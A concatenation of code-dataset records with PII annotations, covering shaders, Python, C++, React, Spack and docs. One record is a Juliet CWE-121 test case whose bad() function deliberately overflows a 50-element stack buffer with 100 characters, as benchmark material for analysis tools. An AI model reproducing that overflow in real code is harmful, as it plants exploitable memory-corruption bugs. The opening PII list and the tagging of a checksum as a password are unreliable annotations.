[{"tag": "USERNAME", "value": "@gethylgeorge", "start": 10583, "end": 10596, "context": "OM and diffing works in React](https://medium.com/@gethylgeorge/how-virtual-dom-and-diffing-works-in-react-6fc805"}, {"tag": "USERNAME", "value": "gopala-kr", "start": 16816, "end": 16825, "context": " and action.\n\n[[more on redux](https://github.com/gopala-kr/weekend-with-github/blob/master/Projects-Blogs/01"}, {"tag": "USERNAME", "value": "gopala-kr", "start": 29307, "end": 29316, "context": " to [hackernews-react-graphql](https://github.com/gopala-kr/hackernews-react-graphql) and deploy it on app st"}, {"tag": "USERNAME", "value": "gopala-kr", "start": 15327, "end": 15336, "context": "ication data.\n\n[[more on flux](https://github.com/gopala-kr/weekend-with-github/blob/master/Projects-Blogs/01"}, {"tag": "USERNAME", "value": "kr_gopala", "start": 29097, "end": 29106, "context": "through tutorials in [Codepen](https://codepen.io/kr_gopala/)\n* to develop a complete full stack web applicat"}, {"tag": "NAME", "value": "Jordan Walke", "start": 4343, "end": 4355, "context": "larJS. [Source : wikipedia]\n\nReact was created by Jordan Walke, a software engineer at Facebook. He was influenc"}]
|
//---------------------------------------------------------------------------
#include <opengl/vertex_layout.h>
//---------------------------------------------------------------------------
// GLSL 3.30 vertex shader for a 2D "wired" (outlined) rectangle, embedded as
// a raw string literal so it can be compiled at runtime.  The "!vertex: p2 t"
// marker inside the shader names the vertex layout it expects (2D position +
// texcoord), matching the p2t layout exported below.
// NOTE(review): "output" is listed among the reserved keywords in the GLSL
// 3.30 specification; most drivers accept it as an interface-block instance
// name, but renaming it would be safer -- confirm against the target
// toolchain before touching the string (the consuming shader stage must
// agree on the block).
static const char * const shader_code_2d_wired_rect_vs = R"SHADER(
/**
 * !vertex: p2 t
 */
#version 330 core
layout(std140) uniform Area
{
	vec2 pos;
	vec2 size;
	float depth;
};
layout(std140) uniform Viewport
{
	vec2 viewport;
};
in vec2 position;
in vec2 texcoord;
out Vertex
{
	vec2 texcoord;
	vec2 ratio;
} output;
void main(void)
{
	output.ratio = size * viewport;
	output.texcoord = texcoord;
	gl_Position = vec4(position * size + pos, depth, 1.0);
}
)SHADER";
//---------------------------------------------------------------------------
// Vertex layout descriptor matching the shader's inputs ("p2 t":
// position vec2 + texcoord vec2).
static const ::asd::opengl::vertex_layout & shader_code_2d_wired_rect_layout = ::asd::opengl::vertex_layouts::p2t::get();
//---------------------------------------------------------------------------
|
C
|
MIT
|
BrightComposite/RSToolkit/code/modules/opengl/resources/opengl/shaders/2d/wired/rect/vs.shader.h
|
5982783c-046c-412f-b97d-05b6c1369a44
|
[]
|
[]
|
# from https://stackoverflow.com/questions/8032642/how-to-obtain-image-size-using-standard-python-class-without-using-external-lib
import struct
import imghdr
def get_image_size(fname):
    """Determine the image type of *fname* and return its ``(width, height)``.

    Supports PNG, GIF and JPEG by sniffing the file's magic bytes directly.
    Returns ``None`` when the file is too short, unrecognised or malformed.

    Fixes over the original StackOverflow/draco snippet:
    - no longer uses ``imghdr`` (deprecated in 3.11, removed in Python 3.13);
      the format is detected from the 24-byte header already in hand, which
      also avoids re-opening/re-reading the file up to three times;
    - the JPEG marker scan now skips DHT/JPG/DAC segments (0xC4, 0xC8, 0xCC),
      which fall inside the 0xC0..0xCF range but are *not* SOFn frames -- the
      original returned garbage dimensions for JPEGs with a Huffman table
      before the frame header.
    """
    with open(fname, "rb") as fhandle:
        head = fhandle.read(24)
        if len(head) != 24:
            return None
        if head.startswith(b"\x89PNG\r\n\x1a\n"):
            # Bytes 4-8 of the PNG signature are \r\n\x1a\n == 0x0D0A1A0A;
            # keep the original sanity check for corrupted signatures.
            check = struct.unpack(">i", head[4:8])[0]
            if check != 0x0D0A1A0A:
                return None
            # IHDR: width and height are big-endian ints at offsets 16..24.
            width, height = struct.unpack(">ii", head[16:24])
        elif head[:6] in (b"GIF87a", b"GIF89a"):
            # Logical screen width/height, little-endian, right after "GIFxxa".
            width, height = struct.unpack("<HH", head[6:10])
        elif head.startswith(b"\xff\xd8"):
            try:
                fhandle.seek(0)  # Read 0xff next
                size = 2
                ftype = 0
                # Walk marker segments until a real SOFn frame header;
                # 0xC4 (DHT), 0xC8 (JPG) and 0xCC (DAC) are not frames.
                while not 0xC0 <= ftype <= 0xCF or ftype in (0xC4, 0xC8, 0xCC):
                    fhandle.seek(size, 1)
                    byte = fhandle.read(1)
                    while ord(byte) == 0xFF:  # skip fill bytes before marker
                        byte = fhandle.read(1)
                    ftype = ord(byte)
                    size = struct.unpack(">H", fhandle.read(2))[0] - 2
                # We are at a SOFn block
                fhandle.seek(1, 1)  # Skip `precision' byte.
                height, width = struct.unpack(">HH", fhandle.read(4))
            except Exception:  # truncated/garbled stream: report "unknown"
                return None
        else:
            return None
    return width, height
|
Python
|
MIT
|
geraked/mdpdfbook/mdpdfbook/mdpdf/image.py
|
73d2e5ff-912a-4884-bc7c-db3356796c58
|
[]
|
[]
|
/*=============================================================================
Copyright (c) 2003 Jonathan de Halleux (dehalleux@pelikhan.com)
http://spirit.sourceforge.net/
Use, modification and distribution is subject to the Boost Software
License, Version 1.0. (See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
=============================================================================*/
#include "action_tests.hpp"
// Driver for the Boost.Spirit classic actor unit tests: each *_action_test()
// exercises one semantic-action helper and records failures through
// boost::report_errors()'s error counter.
int
main()
{
    assign_action_test();
    assign_key_action_test();
    clear_action_test();
    decrement_action_test();
    erase_action_test();
    increment_action_test();
    insert_key_action_test();
    push_front_action_test();
    push_back_action_test();
    swap_action_test();
    // Non-zero exit status when any test above reported an error.
    return boost::report_errors();
}
|
C++
|
BSD-3-Clause
|
0xDEC0DE8/mcsema/boost/libs/spirit/classic/test/actor/action_tests.cpp
|
5d4a8931-8485-4922-8cc8-d3ba2700ff1d
|
[{"tag": "NAME", "value": "Jonathan de Halleux", "start": 103, "end": 122, "context": "==========================\n Copyright (c) 2003 Jonathan de Halleux (dehalleux@pelikhan.com)\n http://spirit.source"}]
|
[{"tag": "NAME", "value": "Jonathan de Halleux", "start": 103, "end": 122, "context": "==========================\n Copyright (c) 2003 Jonathan de Halleux (dehalleux@pelikhan.com)\n http://spirit.source"}]
|
import React from "react"
import landingStyles from "../styles/landing.module.css"
import HeroHeader from "./heroHeader"
import PortfolioProjects from "./portfolioProjects"
// Landing page layout: hero header followed by the portfolio project grid.
const Landing = () => {
  return (
    <div className={landingStyles.landingContainer}>
      {/* Devicon icon font loaded from a CDN for tech-stack icons.
          NOTE(review): a <link> rendered inside the body works in practice
          but belongs in the document head (e.g. via react-helmet) --
          confirm before moving it. */}
      <link
        rel="stylesheet"
        href="https://cdn.jsdelivr.net/gh/konpa/devicon@master/devicon.min.css"
      ></link>
      <HeroHeader />
      <PortfolioProjects />
    </div>
  )
}

export default Landing
|
JavaScript
|
MIT
|
alekspopovic/Gatsby-website-and-blog/src/components/landing.js
|
d39b4db0-0b5c-45fc-a897-6ebee1ee50cf
|
[]
|
[]
|
# Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Parsplice(CMakePackage):
    """ParSplice code implements the Parallel Trajectory Splicing algorithm"""

    # Project locations; `url` points at GitLab's archive API for tagged
    # releases, `git` is used for the moving `develop` version below.
    homepage = "https://gitlab.com/exaalt/parsplice"
    url      = "https://gitlab.com/api/v4/projects/exaalt%2Fparsplice/repository/archive.tar.gz?sha=v1.1"
    git      = "https://gitlab.com/exaalt/parsplice.git"

    tags = ['ecp', 'ecp-apps']

    # Known versions; the hex string is the archive checksum Spack verifies.
    version('develop', branch='master')
    version('1.1', '3a72340d49d731a076e8942f2ae2f4e9')

    depends_on("cmake@3.1:", type='build')
    depends_on("berkeley-db")
    depends_on("nauty")
    depends_on("boost")
    depends_on("mpi")
    depends_on("eigen@3:")
    depends_on("lammps+lib@20170901:")

    def cmake_args(self):
        # Build shared libraries; everything else uses upstream defaults.
        options = ['-DBUILD_SHARED_LIBS=ON']

        return options
|
Python
|
ECL-2.0
|
1nf1n1t3l00p/spack/var/spack/repos/builtin/packages/parsplice/package.py
|
be4a23ec-9ba1-4aaa-8862-804792b2b376
|
[{"tag": "PASSWORD", "value": "3a72340d49d731a076e8942f2ae2f4e9", "start": 641, "end": 673, "context": "n('develop', branch='master')\n version('1.1', '3a72340d49d731a076e8942f2ae2f4e9')\n\n depends_on(\"cmake@3.1:\", type='build')\n "}]
|
[{"tag": "PASSWORD", "value": "3a72340d49d731a076e8942f2ae2f4e9", "start": 641, "end": 673, "context": "n('develop', branch='master')\n version('1.1', '3a72340d49d731a076e8942f2ae2f4e9')\n\n depends_on(\"cmake@3.1:\", type='build')\n "}]
|
/**
\file mwld_simulator.cpp
\author Babarczi Peter
\author babarczi@tmit.bme.hu
\date 2015 november
*/
#include "mwld_simulator.h"
#include <sstream>
//! Clear the per-run measurement state accumulated during a simulation.
//! Structural counters (edge/node/SRLG/demand counts) are deliberately left
//! untouched; this restores exactly the values the constructor body sets for
//! these members.
void MWLDSimulator::reset()
{
    // Availability statistics.
    sum_availability = 0;
    min_availability = 1.0;
    threenines = 0;
    fournines = 0;

    // Blocking counters.
    avail_blocked = 0;
    wp_blocked = 0;
    pp_blocked = 0;
    blocked_connections = 0;
    ss_blocked_connections = 0;

    // Resource-usage accumulators.
    used_edge_number = 0;
    used_capacity = 0;
    nullcap = 0;
    halfcap = 0;

    // Miscellaneous run state.
    counter = 0;
    smart_smpair = false;
    seedd = 1;
}
//! Construct a simulator bound to graph \a _g.
//! The LEMON maps in the initializer list are tied to the graph (or to
//! srg_set for the SRLG bookkeeping maps); all scalar statistics are zeroed
//! in the body.
MWLDSimulator::MWLDSimulator(Digraph &_g) :
    g(_g), cap(g),reduced_cap(g),rfd_cap(g), id(g),
    cost(g), delaymin(g), delaymax(g), minusdelaymax(g), free_cap(g), coords(g), srg_set(g), state_prob(srg_set), srg_id(srg_set), link_unav(g), node_unav(g),
    avail_blocked(0), wp_blocked(0), pp_blocked(0), threenines(0), fournines(0) // deficit_proc(0), extra_proc(0), deficit_num(0), extra_num(0), deficit_p(false), extra_p(false)
{
    // Topology/instance counters, filled by readGraph/readSRLGSet/readTraffic.
    edge_number = 0;
    node_number = 0;
    srg_number = 0;
    demand_number = 0;
    bottlenecks = 0;
    // Run statistics -- same initial values that reset() assigns.
    sum_availability = 0.0;
    min_availability = 1.0;
    used_edge_number = 0;
    used_capacity = 0;
    blocked_connections = 0;
    ss_blocked_connections = 0;
    counter = 0;
    smart_smpair = false;
    nullcap = 0;
    halfcap = 0;
    seedd = 1;
}
//! Access the underlying directed graph of the simulated network.
Digraph& MWLDSimulator::getG()
{
    return g;
}
//! Look up the graph node with the given LEMON node id (linear scan).
//! \param nodeId  id as reported by Digraph::id().
//! \return the matching node, or INVALID when no node has that id.
//
// Fix: the original fell off the end of this value-returning function when
// the id was not found, which is undefined behaviour in C++.  Returning
// INVALID makes the "not found" case well-defined and lets callers test for
// it the usual LEMON way.
DNode MWLDSimulator::getNode(int nodeId)
{
    for (DNodeIt nit(g); nit != INVALID; ++nit)
        if (g.id(nit) == nodeId)
        {
            return nit;
        }
    return INVALID;
}
//! Mark arcs that cannot carry a working path of \a mincapacity.
//! Every arc whose remaining free capacity is below the threshold is flagged
//! false in \a can_be_work_edge; arcs with enough capacity are left as-is.
void MWLDSimulator::setEdgesWithEnoughCapacity(DBoolMap& can_be_work_edge, double mincapacity) const
{
    for (ArcIt arc(g); arc != INVALID; ++arc)
    {
        if (free_cap[arc] < mincapacity)
            can_be_work_edge[arc] = false;
    }
}
//! Decide, per SRLG, whether protection is needed and possible: an SRLG is
//! marked in \a havetoprotect iff \a source and \a target remain connected
//! after removing every arc of that SRLG (checked with Dijkstra on the
//! filtered subgraph).
void MWLDSimulator::chooseSRLGList(DNode source, DNode target, BoolSRLGMap & havetoprotect)
{
    int num = 0;  // number of SRLGs that need (and admit) protection
    // Start from "no SRLG needs protection".
    for(SRLGIt srg_it(srg_set);srg_it != INVALID;++srg_it){
        havetoprotect[srg_it] = false;
    }

    for(SRLGIt srg(srg_set);srg != INVALID;++srg){
        // Build an arc filter excluding every arc of this SRLG ...
        DBoolMap should_be_use(g);
        for(ArcIt it(g);it != INVALID;++it)
            should_be_use[it] = true;
        for(SRLGArcIt srg_edge_it(srg_set, srg);srg_edge_it != INVALID;++srg_edge_it)
            should_be_use[srg_edge_it] = false;
        DFilteredGraph allowed_subgraph(g, should_be_use);

        // ... and test whether a protection path still exists in it.
        DFDijkstra prot_dijkstra(allowed_subgraph, cost);
        if(prot_dijkstra.run(source, target)){
            havetoprotect[srg] = true;
            num++;
        }
    }
    //cout << "SRLGs need protection: " << num << endl;
}
//! Commit an accepted demand: for every arc it uses (and that arc's
//! opposite), subtract the consumed capacity from free_cap, accumulate the
//! usage statistics, then append the demand to \a built_connections.
//! NOTE(review): arcs are matched against the demand's used_edges by
//! comparing make_name() strings, which is O(|E| * |used_edges|) -- fine for
//! simulation-sized inputs, but worth keeping in mind.
void MWLDSimulator::addToBuiltConnections(TrafficDemand<Digraph>& next_demand, list<TrafficDemand<Digraph> > & built_connections)
{
    for(ArcIt eit(g);eit != INVALID;++eit){
        for(map<string,double>::iterator str_it = next_demand.used_edges.begin();str_it != next_demand.used_edges.end();++str_it){
            string compare = str_it->first;
            double percentage = str_it->second;  // fraction of the demand routed over this arc
            if(make_name("-", eit, g) == compare){
                // Reserve capacity in both directions of the link.
                free_cap[eit] = free_cap[eit] - next_demand.capacity * percentage;
                free_cap[oppositeArc(eit)] = free_cap[oppositeArc(eit)] - next_demand.capacity * percentage;
                used_edge_number = used_edge_number + percentage;
                used_capacity = used_capacity + next_demand.capacity * percentage;
            }
        }
    }
    built_connections.push_back(next_demand);
}
//! Read input graph.
//! Parses node coordinates and per-node/per-arc unavailabilities with
//! LEMON's DigraphReader, counts nodes and (undirected) edges, then gives
//! every arc the uniform \a capacity, unit cost, and a delay proportional to
//! its Euclidean length.
void MWLDSimulator::readGraph(ifstream &srg_file, int capacity)
{
    //cout << "Reading the graph from input file..." <<endl;
    DigraphReader<Digraph> unavreader(g, srg_file);
    unavreader.nodeMap("coords", coords) .nodeMap("unav", node_unav) .arcMap("unav", link_unav).run();

    for (ArcIt eit(g); eit != INVALID; ++eit)
        edge_number++;
    edge_number /= 2; // As the graph is directed

    for (DNodeIt nit(g); nit != INVALID; ++nit)
        node_number++;

    for (ArcIt eit(g); eit != INVALID; ++eit){
        cap[eit] = capacity;
        free_cap[eit] = cap[eit];
        cost[eit] = 1;
        rnd = random();  // NOTE(review): rnd is assigned but unused here -- confirm it is consumed elsewhere
        int delayconst = 5;  // delay units per unit of Euclidean distance
        DNode n1 = g.source(eit);
        DNode n2 = g.target(eit);
        lemon::dim2::Point<float> tempinput = coords[n2] - coords[n1];
        // Both delay bounds equal the geometric link length times delayconst.
        delaymin[eit] = sqrt(tempinput.normSquare())*delayconst;
        delaymax[eit] = sqrt(tempinput.normSquare())*delayconst;
        minusdelaymax[eit] = -1*delaymax[eit];
    }
}
//! Read connection requests into traffic_queue.
//!
//! Each record is either
//!   c <connId> <srcNodeId> <dstNodeId> <capacity>   -- build a connection
//!   r <connId>                                      -- release a connection
//! and the rest of the line is ignored.
//!
//! Fix: the original looped on !trf_file.eof(), which checks for EOF
//! *before* the extraction that can hit it, so a trailing newline or a
//! truncated record could run the body on a failed read.  Looping on the
//! extraction itself only processes records that were actually read.  The
//! unused local `int id` was also removed.
void MWLDSimulator::readTraffic(ifstream &trf_file)
{
    //cout << endl << "Reading the traffic file..." <<endl;
    string mode;
    while (trf_file >> mode)
    {
        if (mode == "c")
        { // create connection
            demand_number++;
            int connId;
            int sourceNodeId;
            int targetNodeId;
            DCapValue capacity;
            trf_file >> connId;
            trf_file >> sourceNodeId;
            trf_file >> targetNodeId;
            trf_file >> capacity;

            traffic_queue.push(TrafficDemand<Digraph>(&g, &srg_set, BUILD, connId, getNode(sourceNodeId),
                                                      getNode(targetNodeId), capacity));
        }
        else if (mode == "r")
        {
            int connId;
            trf_file >> connId;
            traffic_queue.push(TrafficDemand<Digraph>(&g, &srg_set, RELEASE, connId, DNode(), DNode(), 0));
        }
        // Skip the remainder of the line (comments / extra fields).
        trf_file.ignore(256, '\n');
    }
    cout << "trfqueue size: " << traffic_queue.size() << endl;
}
//! Read failure list, contains single link failures by default.
//! Each SRLG (shared risk link group) arrives from SRLGReader as an id, a
//! state probability and a list of arc-name strings; the names are resolved
//! back to graph arcs by comparing against make_name().
void MWLDSimulator::readSRLGSet(ifstream &srg_file)
{
    log_msg(2) << "Reading the SRLGSet from input file..." <<endl;
    queue<int> id_q;
    queue<vector<string> > edges_q;
    queue<long double> state_prob_q;

    SRLGReader srg_reader;
    srg_reader.readSRGSet(srg_file, id_q, edges_q, state_prob_q);

    for(int i = id_q.size(); i > 0; i--){
        SRLG srg = srg_set.addSRG();
        log_msg(2) << "\nSRLG "<<make_name(srg,srg_set)<<" ";
        srg_id[srg] = id_q.front();
        state_prob[srg] = state_prob_q.front();
        // Resolve each stored arc name to the matching arc of g.
        for(vector<string>::iterator string_it = edges_q.front().begin(); string_it != edges_q.front().end(); string_it++){
            for(ArcIt eit(g); eit != INVALID; ++eit){
                if( make_name("-", eit, g) == *string_it ){
                    srg_set.addArcToSRG(srg,eit);
                    log_msg(2) << " " << make_name("-", eit, g);
                    break;
                }
            }
        }
        id_q.pop();
        edges_q.pop();
        state_prob_q.pop();
    }
    for(SRLGIt srg_it(srg_set);srg_it != INVALID;++srg_it) srg_number++;
}
//! Debug helper: print every SRLG of \a _srg_set together with the arcs it
//! contains.  Output format is unchanged.
void MWLDSimulator::viewSRLGSet(SRLGSet& _srg_set) const
{
    //cout<<endl<<"Now we walk throught the SRLG-s and the arcs in them."<<endl;
    for (SRLGIt group(_srg_set); group != INVALID; ++group)
    {
        cout << "SRLG: " << make_name(group, _srg_set) << endl;
        cout << " and the arcs in it:" << endl;

        for (SRLGArcIt member(_srg_set, group); member != INVALID; ++member)
        {
            cout << " arc: " << make_name("->", member, g) << endl;
        }
    }
}
//! Trivial destructor: all resources are owned by value members.
MWLDSimulator::~MWLDSimulator()
{
}
|
C++
|
MIT
|
peterbabarczi/mwldsim/mwld_simulator.cpp
|
cc3c669c-adc9-4f5c-ab7c-a206c5423b63
|
[{"tag": "EMAIL", "value": "babarczi@tmit.bme.hu", "start": 90, "end": 110, "context": " Babarczi Peter\n \\author babarczi@tmit.bme.hu\n \\date 2015 november\n*/\n\n#include "}, {"tag": "NAME", "value": "Babarczi Peter", "start": 53, "end": 67, "context": "\n \\file mwld_simulator.cpp\n\n \\author Babarczi Peter\n \\author babarczi@tmit.bme.hu\n \\date"}]
|
[{"tag": "EMAIL", "value": "babarczi@tmit.bme.hu", "start": 90, "end": 110, "context": " Babarczi Peter\n \\author babarczi@tmit.bme.hu\n \\date 2015 november\n*/\n\n#include "}, {"tag": "NAME", "value": "Babarczi Peter", "start": 53, "end": 67, "context": "\n \\file mwld_simulator.cpp\n\n \\author Babarczi Peter\n \\author babarczi@tmit.bme.hu\n \\date"}]
|
[stime](../README.md) › [Globals](../globals.md) › ["Format/Minute"](../modules/_format_minute_.md) › [Minute](_format_minute_.minute.md)
# Class: Minute
Minute format
## Hierarchy
* [Format](_format_.format.md)
↳ **Minute**
## Index
### Methods
* [format](_format_minute_.minute.md#format)
* [formatNumber](_format_minute_.minute.md#protected-formatnumber)
* [parse](_format_minute_.minute.md#parse)
* [parsePaddedAndUnpaddedUnits](_format_minute_.minute.md#protected-parsepaddedandunpaddedunits)
## Methods
### format
▸ **format**(`time`: [Formattable](_formattable_.formattable.md), `format`: string): *string*
*Overrides [Format](_format_.format.md).[format](_format_.format.md#abstract-format)*
*Defined in [Format/Minute.ts:11](https://github.com/TerenceJefferies/STime/blob/b69ea6e/src/Format/Minute.ts#L11)*
**`inheritdoc`**
**Parameters:**
Name | Type |
------ | ------ |
`time` | [Formattable](_formattable_.formattable.md) |
`format` | string |
**Returns:** *string*
___
### `Protected` formatNumber
▸ **formatNumber**(`number`: number, `leadingZero`: boolean): *string*
*Inherited from [Year](_format_year_.year.md).[formatNumber](_format_year_.year.md#protected-formatnumber)*
*Defined in [Format.ts:27](https://github.com/TerenceJefferies/STime/blob/b69ea6e/src/Format.ts#L27)*
Format a number to a string and have it include or exclude
leading zeros
**Parameters:**
Name | Type | Description |
------ | ------ | ------ |
`number` | number | Number to format |
`leadingZero` | boolean | True if leading zeros should be included, false otherwise |
**Returns:** *string*
Formatted number
___
### parse
▸ **parse**(`parsable`: string, `format`: string): *number*
*Defined in [Format/Minute.ts:26](https://github.com/TerenceJefferies/STime/blob/b69ea6e/src/Format/Minute.ts#L26)*
**`inheritdoc`**
**Parameters:**
Name | Type |
------ | ------ |
`parsable` | string |
`format` | string |
**Returns:** *number*
___
### `Protected` parsePaddedAndUnpaddedUnits
▸ **parsePaddedAndUnpaddedUnits**(`parsable`: string, `format`: string, `token`: string): *number*
*Inherited from [Year](_format_year_.year.md).[parsePaddedAndUnpaddedUnits](_format_year_.year.md#protected-parsepaddedandunpaddedunits)*
*Defined in [Format.ts:43](https://github.com/TerenceJefferies/STime/blob/b69ea6e/src/Format.ts#L43)*
**Parameters:**
Name | Type | Description |
------ | ------ | ------ |
`parsable` | string | - |
`format` | string | - |
`token` | string | |
**Returns:** *number*
|
Markdown
|
MIT
|
LiamCottrell/STime/docs/classes/_format_minute_.minute.md
|
21837c34-1a60-4104-a8e5-6af1dd72eb2c
|
[]
|
[]
|
/**
* OEML - REST API
* This section will provide necessary information about the `CoinAPI OEML REST API` protocol. This API is also available in the Postman application: <a href=\"https://postman.coinapi.io/\" target=\"_blank\">https://postman.coinapi.io/</a>
*
* The version of the OpenAPI document: v1
* Contact: support@coinapi.io
*
* NOTE: This class is auto generated by OpenAPI-Generator 5.1.1.
* https://openapi-generator.tech
* Do not edit the class manually.
*/
#include "ApiConfiguration.h"
namespace org {
namespace openapitools {
namespace client {
namespace api {

// Holds the client-wide settings (base URL, user agent, default headers,
// API keys, cpprestsdk HTTP config) shared by the generated API classes.
ApiConfiguration::ApiConfiguration()
{
}

ApiConfiguration::~ApiConfiguration()
{
}

// cpprestsdk http_client configuration (timeouts, proxy, etc.).
const web::http::client::http_client_config& ApiConfiguration::getHttpConfig() const
{
    return m_HttpConfig;
}

void ApiConfiguration::setHttpConfig( web::http::client::http_client_config& value )
{
    m_HttpConfig = value;
}

// Base URL all request paths are appended to.
utility::string_t ApiConfiguration::getBaseUrl() const
{
    return m_BaseUrl;
}

void ApiConfiguration::setBaseUrl( const utility::string_t value )
{
    m_BaseUrl = value;
}

utility::string_t ApiConfiguration::getUserAgent() const
{
    return m_UserAgent;
}

void ApiConfiguration::setUserAgent( const utility::string_t value )
{
    m_UserAgent = value;
}

// Headers added to every request (mutable and const accessors).
std::map<utility::string_t, utility::string_t>& ApiConfiguration::getDefaultHeaders()
{
    return m_DefaultHeaders;
}

const std::map<utility::string_t, utility::string_t>& ApiConfiguration::getDefaultHeaders() const
{
    return m_DefaultHeaders;
}

// Returns the API key registered under `prefix`, or an empty string when
// no key has been set for that prefix.
utility::string_t ApiConfiguration::getApiKey( const utility::string_t& prefix) const
{
    auto result = m_ApiKeys.find(prefix);
    if( result != m_ApiKeys.end() )
    {
        return result->second;
    }
    return utility::conversions::to_string_t("");
}

void ApiConfiguration::setApiKey( const utility::string_t& prefix, const utility::string_t& apiKey )
{
    m_ApiKeys[prefix] = apiKey;
}

}
}
}
}
|
C++
|
MIT
|
Martin-Molinero/coinapi-sdk/oeml-sdk/cpp-restsdk/ApiConfiguration.cpp
|
496b3dfa-12e5-4750-8919-dcdfe9e2d57c
|
[]
|
[]
|
/* TEMPLATE GENERATED TESTCASE FILE
Filename: CWE121_Stack_Based_Buffer_Overflow__CWE805_wchar_t_alloca_loop_33.cpp
Label Definition File: CWE121_Stack_Based_Buffer_Overflow__CWE805.string.label.xml
Template File: sources-sink-33.tmpl.cpp
*/
/*
* @description
* CWE: 121 Stack Based Buffer Overflow
* BadSource: Set data pointer to the bad buffer
* GoodSource: Set data pointer to the good buffer
* Sinks: loop
* BadSink : Copy string to data using a loop
* Flow Variant: 33 Data flow: use of a C++ reference to data within the same function
*
* */
#include "std_testcase.h"
#include <wchar.h>
// NOTE(review): this is a deliberately vulnerable Juliet/SARD test case used
// to benchmark static-analysis tools.  The FLAW-marked defects are the whole
// point of the file and must NOT be "fixed"; the unused good/bad buffer in
// each function is likewise intentional (both variants allocate both buffers
// so that only the chosen pointer differs between good and bad).
namespace CWE121_Stack_Based_Buffer_Overflow__CWE805_wchar_t_alloca_loop_33
{

#ifndef OMITBAD

void bad()
{
    wchar_t * data;
    wchar_t * &dataRef = data;
    wchar_t * dataBadBuffer = (wchar_t *)ALLOCA(50*sizeof(wchar_t));
    wchar_t * dataGoodBuffer = (wchar_t *)ALLOCA(100*sizeof(wchar_t));
    /* FLAW: Set a pointer to a "small" buffer. This buffer will be used in the sinks as a destination
     * buffer in various memory copying functions using a "large" source buffer. */
    data = dataBadBuffer;
    data[0] = L'\0'; /* null terminate */
    {
        wchar_t * data = dataRef;
        {
            size_t i;
            wchar_t source[100];
            wmemset(source, L'C', 100-1); /* fill with L'C's */
            source[100-1] = L'\0'; /* null terminate */
            /* POTENTIAL FLAW: Possible buffer overflow if the size of data is less than the length of source */
            for (i = 0; i < 100; i++)
            {
                data[i] = source[i];
            }
            data[100-1] = L'\0'; /* Ensure the destination buffer is null terminated */
            printWLine(data);
        }
    }
}

#endif /* OMITBAD */

#ifndef OMITGOOD

/* goodG2B() uses the GoodSource with the BadSink */
static void goodG2B()
{
    wchar_t * data;
    wchar_t * &dataRef = data;
    wchar_t * dataBadBuffer = (wchar_t *)ALLOCA(50*sizeof(wchar_t));
    wchar_t * dataGoodBuffer = (wchar_t *)ALLOCA(100*sizeof(wchar_t));
    /* FIX: Set a pointer to a "large" buffer, thus avoiding buffer overflows in the sinks. */
    data = dataGoodBuffer;
    data[0] = L'\0'; /* null terminate */
    {
        wchar_t * data = dataRef;
        {
            size_t i;
            wchar_t source[100];
            wmemset(source, L'C', 100-1); /* fill with L'C's */
            source[100-1] = L'\0'; /* null terminate */
            /* POTENTIAL FLAW: Possible buffer overflow if the size of data is less than the length of source */
            for (i = 0; i < 100; i++)
            {
                data[i] = source[i];
            }
            data[100-1] = L'\0'; /* Ensure the destination buffer is null terminated */
            printWLine(data);
        }
    }
}

void good()
{
    goodG2B();
}

#endif /* OMITGOOD */

} /* close namespace */
/* Below is the main(). It is only used when building this testcase on
* its own for testing or for building a binary to use in testing binary
* analysis tools. It is not used when compiling all the testcases as one
* application, which is how source code analysis tools are tested.
*/
#ifdef INCLUDEMAIN
using namespace CWE121_Stack_Based_Buffer_Overflow__CWE805_wchar_t_alloca_loop_33; /* so that we can use good and bad easily */
// Standalone driver used only when the testcase is built on its own
// (INCLUDEMAIN): runs the good and/or bad variants depending on the
// OMITGOOD/OMITBAD build switches.
int main(int argc, char * argv[])
{
    /* seed randomness */
    srand( (unsigned)time(NULL) );
#ifndef OMITGOOD
    printLine("Calling good()...");
    good();
    printLine("Finished good()");
#endif /* OMITGOOD */
#ifndef OMITBAD
    printLine("Calling bad()...");
    bad();
    printLine("Finished bad()");
#endif /* OMITBAD */
    return 0;
}
#endif
|
C++
|
BSD-3-Clause
|
JianpingZeng/xcc/xcc/test/juliet/testcases/CWE121_Stack_Based_Buffer_Overflow/s05/CWE121_Stack_Based_Buffer_Overflow__CWE805_wchar_t_alloca_loop_33.cpp
|
c9c9a7c5-63b6-412e-b564-de901c70d99e
|
[]
|
[]
|
#!/usr/bin/env python2.5
#
# Copyright 2009 the Melange authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module that contains base class for Melange Expando models.
"""
__authors__ = [
'"Lennard de Rijk" <ljvderijk@gmail.com>',
]
from google.appengine.ext import db
from soc.logic import dicts
class ExpandoBase(db.Expando):
  """Expando Base model.

  This might later on contain general functionalities like the
  ModelWithFieldAttributes model.
  """

  # Serializes this entity's properties into a plain dict
  # (see soc.logic.dicts.toDict).
  toDict = dicts.toDict
|
Python
|
Apache-2.0
|
MatthewWilkes/mw4068-packaging/src/melange/src/soc/models/expando_base.py
|
58943f07-cec9-4f1e-948f-2b21507d2830
|
[{"tag": "NAME", "value": "Lennard de Rijk", "start": 700, "end": 715, "context": " Melange Expando models.\n\"\"\"\n\n__authors__ = [\n '\"Lennard de Rijk\" <ljvderijk@gmail.com>',\n]\n\n\nfrom google.appengin"}, {"tag": "EMAIL", "value": "ljvderijk@gmail.com", "start": 718, "end": 737, "context": "odels.\n\"\"\"\n\n__authors__ = [\n '\"Lennard de Rijk\" <ljvderijk@gmail.com>',\n]\n\n\nfrom google.appengine.ext import db\n\nfrom "}]
|
[{"tag": "NAME", "value": "Lennard de Rijk", "start": 700, "end": 715, "context": " Melange Expando models.\n\"\"\"\n\n__authors__ = [\n '\"Lennard de Rijk\" <ljvderijk@gmail.com>',\n]\n\n\nfrom google.appengin"}, {"tag": "EMAIL", "value": "ljvderijk@gmail.com", "start": 718, "end": 737, "context": "odels.\n\"\"\"\n\n__authors__ = [\n '\"Lennard de Rijk\" <ljvderijk@gmail.com>',\n]\n\n\nfrom google.appengine.ext import db\n\nfrom "}]
|
